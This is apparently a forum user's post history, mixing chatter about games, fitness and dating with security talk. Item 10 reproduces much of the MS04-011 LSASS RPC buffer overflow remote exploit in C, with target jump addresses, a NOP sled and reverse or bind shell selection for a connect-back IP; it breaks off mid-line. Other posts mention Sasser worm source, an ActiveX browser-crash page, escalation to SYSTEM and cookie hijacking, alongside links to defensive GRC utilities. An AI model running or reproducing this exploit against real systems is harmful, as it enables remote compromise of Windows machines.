Everything posted by axxl2006

  1. You need to get as many "votes" as possible, which means having a link on a site with a higher PR. If you don't have money for advertising, try a link exchange. Now go "hack" ebay.com yourselves and put the link there :@
  2. QUOTE("Thunder") :@ ..now excuse me...as far as I knew, the administrator makes the law :@
  3. QUOTE("Thunder") Sure, the administrator won't even notice that someone has a CS server on his router :?
  4. I don't get a belly no matter what :@ but I also have a sporty lifestyle. The belly is the hardest thing to get rid of. Don't put your trust in creams, diets and nonsense. The gym is the only way, lots of work and patience
  5. QUOTE("icerw") It is also called Linux Backdoor...
  6. The trick is old and only works if you are Administrator. You can go from Administrator to SYSTEM.
  7. This is only a part of the source code of the Sasser worm. As you can tell, it is only the part that exploits the lsass vulnerability. The source code for the ftp server, its installation and registry keys, copying it to the victim's PC, generating a random IP and exploiting it...and others, depending on the version, are missing.
  8. Well, that's what I was telling the guys too. But if you log out, the session expires and the cookie is automatically no longer valid
  9. Unfortunately I see it no longer works. It used to work some time ago. I ask a moderator to move the topic to the trash
  10. #include <stdio.h>
      #include <string.h>
      #include <netdb.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <sys/types.h>
      #include <arpa/inet.h>

      #define LEN 3500
      #define BUFSIZE 2000
      #define NOP 0x90

      struct targets {
          int num;
          char name[50];
          long jmpaddr;
      } ttarget[]= {
          { 0, "WinXP Professional   [universal] lsass.exe ", 0x01004600 }, // jmp esp addr
          { 1, "Win2k Professional   [universal] netrap.dll", 0x7515123c }, // jmp ebx addr
          { 2, "Win2k Advanced Server [SP4]    netrap.dll", 0x751c123c }, // jmp ebx addr
      };

      void usage(char *prog)
      {
          int i;
          printf("Usage:\n\n");
          printf("%s <target> <victim IP> <bindport> [connectback IP] [options]\n\n", prog);
          printf("Targets:\n");
          for (i=0; i<3; i++)
              printf(" %d [0x%.8x]: %s\n", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name);
          printf("\nOptions:\n");
          printf(" -t: Detect remote OS:\n");
          printf(" Windows 5.1 - WinXP\n");
          printf(" Windows 5.0 - Win2k\n\n");
          exit(0);
      }

      int main(int argc, char *argv[])
      {
          int i;
          int opt = 0;
          char *target;
          char hostipc[40];
          char hostipc2[40*2];
          unsigned short port;
          unsigned long ip;
          unsigned char *sc;
          char buf[LEN+1];
          char sendbuf[(LEN+1)*2];
          char req4u[sizeof(req4)+20];
          char screq[BUFSIZE+sizeof(req7)+1500+440];
          char screq2k[4348+4060];
          char screq2k2[4348+4060];
          char recvbuf[1600];
          char strasm[]="x66x81xECx1Cx07xFFxE4";
          char strBuffer[BUFSIZE];
          unsigned int targetnum = 0;
          int len, sockfd;
          short dport = 445;
          struct hostent *he;
          struct sockaddr_in their_addr;
          char smblen;
          char unclen;

          printf("\nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1\n");
          printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

          if (argc < 4) {
              usage(argv[0]);
          }

          target = argv[2];
          sprintf((char *)hostipc,"%sipc$", target);

          for (i=0; i<40; i++) {
              hostipc2[i*2] = hostipc[i];
              hostipc2[i*2+1] = 0;
          }

          memcpy(req4u, req4, sizeof(req4)-1);
          memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
          memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);

          smblen = 52+(char)strlen(hostipc)*2;
          memcpy(req4u+3, &smblen, 1);

          unclen = 9 + (char)strlen(hostipc)*2;
          memcpy(req4u+45, &unclen, 1);

          if (argc > 4)
              if (!memcmp(argv[4], "-t", 2)) opt = 1;

          if ( (argc > 4) && !opt ) {
              port = htons(atoi(argv[3]))^(unsigned short int)0x9999;
              ip = inet_addr(argv[4])^(unsigned long int)0x99999999;
              memcpy(&reverseshell[118], &port, 2);
              memcpy(&reverseshell[111], &ip, 4);
              sc = reverseshell;
          } else {
              port = htons(atoi(argv[3]))^(unsigned short int)0x9999;
              memcpy(&bindshell[176], &port, 2);
              sc = bindshell;
          }

          if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
              memset(buf, NOP, LEN);

              //memcpy(&buf[2020], "x3cx12x15x75", 4);
              memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);
              memcpy(&buf[2036], sc, strlen(sc));

              memcpy(&buf[2840], "xebx06xebx06", 4);
              memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr
              //memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addr

              memcpy(&buf[2856], sc, strlen(sc));

              for (i=0; i<LEN; i++) {
                  sendbuf[i*2] = buf[i];
                  sendbuf[i*2+1] = 0;
              }
              sendbuf[LEN*2]=0;
              sendbuf[LEN*2+1]=0;

              memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
              memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
          } else {
              memset(strBuffer, NOP, BUFSIZE);
              memcpy(strBuffer+160, sc, strlen(sc));
              memcpy(strBuffer+1980, strasm, strlen(strasm));
              *(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr;
          }

          memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);

          if ((he=gethostbyname(argv[2])) == NULL) { // get the host info
              perror("[-] gethostbyname ");
              exit(1);
          }

          if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
              perror("socket");
              exit(1);
          }

          their_addr.sin_family = AF_INET;
          their_addr.sin_port = htons(dport);
          their_addr.sin_addr = *((struct in_addr *)he->h_addr);
          memset(&(their_addr.sin_zero), '
  11. network IP, but it will not take someone else's public IP
  12. I don't think there is any ISP left where something like this still works... Maybe at those small neighborhood ones, where the admin is a 16-year-old kid
  13. As originally urged by the FBI, and still urged by prominent security experts, our UnPnP utility easily disables the dangerous, and almost always unnecessary, Universal Plug and Play service. If you don't need it, turn it off. (For ALL versions of Windows.) The Universal Plug and Play service (UPnP), which is installed and running in all versions of Windows XP — and may be loaded into Windows 98 and ME — essentially turns every one of those systems into a wide-open Internet server. This server listens for TCP connections on port 5000 and for UDP 'datagram' packets arriving on port 1900. This allows malicious hackers (or high-speed Internet worms) located anywhere in the world to scan for, and locate, individual Windows UPnP-equipped machines. Any vulnerabilities — known today or discovered tomorrow — can then be rapidly exploited. http://www.grc.com/files/unpnp.exe
  14. DCOMbobulator allows any Windows user to easily verify the effectiveness of Microsoft's recent critical DCOM patch. Confirmed reports have demonstrated that the patch is not always effective in eliminating DCOM's remote exploit vulnerability. But more importantly, since DCOM is a virtually unused and unneeded facility, the DCOMbobulator allows any Windows user to easily disable DCOM for significantly greater security. http://www.grc.com/files/DCOMbob.exe
  15. If I'm not mistaken, replacing cookies doesn't have much to do with what kind of forums you use. If the session was closed (that is, I logged out), that cookie is no longer valid. I'm waiting for master kwerln to confirm, since I think he is better documented on this sort of thing
  16. <html><body><script> function Demo() { var a = new ActiveXObject("Internet.HHCtrl.1"); a.Click(); } </script> Clicking the button below may crash your browser! <input type='button' onClick='Demo()' value='Start Demo!'> </body></html>
  17. I wouldn't mind joining a clan..but I definitely don't have time for clan wars :@
  18. You still have a way to go...but to give you a hint, you need to know Assembly, a low-level language....that is, you need to know how a computer works at a very low level, the processor and memory in general.
  19. The only games I still play are Starcraft and CS. Lately I've been playing CS, but the ones who come in with cheats and then leave annoy me..
  20. "when I grow up he'll let me drive his car.." :@
  21. Guta the fish salami wonder - the enemies die because they see that I have girls and heavy lei
  22. Haven't you noticed that I was having fun too :@ ...not that I lied about anything..... Speaking seriously, it was something close to my description, with brown eyes, chestnut hair, 1,72-73. She used to go to those star contests ...and I kept laughing at her :@
  23. I give up, there's no point anymore...I hope you won't contradict me now as well...